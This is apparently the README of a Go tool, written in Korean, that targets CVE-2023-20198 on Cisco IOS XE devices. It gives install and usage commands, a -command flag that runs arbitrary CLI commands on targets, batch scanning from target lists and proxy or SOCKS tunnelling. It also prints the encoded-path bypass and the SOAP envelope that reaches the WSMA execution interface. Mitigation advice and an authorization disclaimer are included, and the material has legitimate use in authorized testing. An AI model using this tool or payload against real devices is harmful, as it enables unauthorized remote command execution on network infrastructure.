
Go 기반 취약점 스캐너로, Cisco IOS XE 장치에서 CVE-2023-20198을 탐지합니다. 배치 스캐닝과 HTML 보고서 생성을 통해 SOAP/XML 인터페이스(WSMA)를 테스트하여 원격 코드 실행을 확인합니다.
Cisco IOS XE 장치에서 CVE-2023-20198을 탐지하는 전문 취약점 스캐너입니다. 취약한 SOAP/XML 인터페이스(WSMA)를 테스트합니다. 승인된 보안 평가 및 네트워크 감사를 위해 설계되었습니다.
승인된 보안 테스트 전용
이 도구는 다음 용도로만 사용해야 합니다:
권한 없이 컴퓨터 시스템에 접근하는 것은 불법입니다. 시스템을 테스트하기 전에 항상 적절한 권한이 있는지 확인하십시오.
go install 사용 (권장)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
바이너리는 $GOPATH/bin 디렉토리(보통 ~/go/bin)에 설치됩니다.
# 저장소 복제
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# 빌드
go build -o cisco-cve-2023-20198-checker
# 설치 (선택사항)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# 단일 대상 점검
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# 여러 대상 점검
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# HTML 보고서 생성
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
기업 환경에 완벽합니다! 다음을 지원합니다:
# HTTP 프록시
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (SSH 터널)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# 환경 변수
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
자세한 프록시 구성은 PROXY_GUIDE.md를 참조하세요.
| 플래그 | 유형 | 기본값 | 설명 |
|---|---|---|---|
-target | string | - | 단일 대상 IP/호스트명 |
-targets-file | string | - | 대상 목록 파일 (한 줄에 하나) |
-port | int | 443 | HTTPS/SOAP 포트 |
-username | string | admin | SOAP 사용자 이름 |
-password | string | - | 필수. SOAP 비밀번호 |
-command | string | uname -a | 실행할 명령어 |
-html | bool | false | HTML 보고서 생성 |
-timeout | int | 10 | 요청 타임아웃 (초) |
-skip-verify | bool | true | SSL 인증서 검증 건너뛰기 |
-proxy | string | - | 프록시 URL (http://, https://, socks5://) |
# 기본 취약점 점검
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# 사용자 정의 포트
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# 특정 명령어 실행
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# 보고서 생성
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# 대상 파일 생성
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# 모든 대상 테스트
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# HTML 보고서 포함 배치
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# 네트워크 열거
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# 버전 탐지
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# HTTP 프록시 사용
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 프록시 사용 (SSH 터널)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# 인증이 필요한 프록시
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
CVE ID: CVE-2023-20198
CVSS 점수: 10.0 (심각)
유형: 원격 코드 실행 (RCE)
영향: Cisco IOS XE Web UI (WSMA)
/%2577ebui_wsma_https (경로 인코딩 우회)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
장치가 취약한 경우:
1. WSMA 비활성화 (필요하지 않은 경우)
no ip http server
no ip http secure-server
2. ACL로 접근 제한
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. 펌웨어 업데이트 - 최신 Cisco 보안 패치 적용
4. 강력한 인증 사용
aaa new-model
aaa authentication login default group tacacs+ local
5. 로그 모니터링 - 의심스러운 SOAP/HTTP 활동 감시
# 표준 빌드
go build -o cisco-cve-2023-20198-checker
# 최적화 (더 작은 바이너리)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# 플랫폼 간 크로스 컴파일
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ Cisco SOAP/XML 보안 점검기 ║
║ 교육 및 승인된 보안 평가 전용 ║
╚═══════════════════════════════════════════════════════════╝
[*] 명령어: show version
[*] 포트: 443
[*] 타임아웃: 10초
[1/1] 대상 테스트 중: 192.168.1.100:443
[*] SOAP 요청 전송 중...
[+] 응답 수신 (상태: 200)
[+] 성공!
╔═══════════════════════════════════════════════════════════╗
║ 배치 결과 ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - 성공
Cisco IOS XE Software, Version 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ 요약 ║
╚═══════════════════════════════════════════════════════════╝
총 대상: 1
성공: 1
실패: 0
전문 보안 평가 보고서에는 다음이 포함됩니다:
기여를 환영합니다! 다음 절차를 따라주세요:
MIT 라이선스 - LICENSE 파일 참조
이 도구는 승인된 취약점 스캔만을 위한 것입니다. 저자는 오용에 대한 책임을 지지 않습니다. 소유하지 않은 시스템을 테스트하기 전에 항상 서면 허가를 받으십시오.
보안 커뮤니티를 위해 제작됨 🛡️